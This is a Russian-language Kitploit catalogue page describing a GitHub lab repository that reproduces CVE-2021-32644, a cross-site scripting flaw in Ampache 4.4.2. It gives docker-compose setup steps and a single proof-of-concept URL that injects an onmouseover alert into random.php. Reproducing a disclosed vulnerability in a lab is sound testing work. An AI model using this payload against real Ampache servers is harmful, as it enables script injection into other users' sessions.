Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-32644 — Ampache XSS | Kitploit
Инструменты/GitHubGitHub/dnr6419/cve-2021-32644
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubdnr6419/cve-2021-32644

CVE-2021-32644

Ampache XSS

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-32644

Эта уязвимость — XSS, которая затрагивала версии Ampache до 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644

Порядок установки и запуска

1. Установка Ampache

При установке выполните проброс портов в файле docker-compose.yml. Устанавливаемая версия Ampache — 4.4.2.

root@kitploit:~
 $docker-compose up  

2. Подключение к Ampache

Перейдите по адресу http://[web-server ip]:port/.

2. Подключение к Ampache и настройка MySQL

Перейдите по адресу http://[web-server ip]:port/. Настройте базу данных MySQL, как показано на рисунке ниже. image

3. PoC

При вставке приведённого ниже PoC можно увидеть, что возникает XSS-уязвимость.

root@kitploit:~
 http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

image

Источник

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html

Скачать инструмент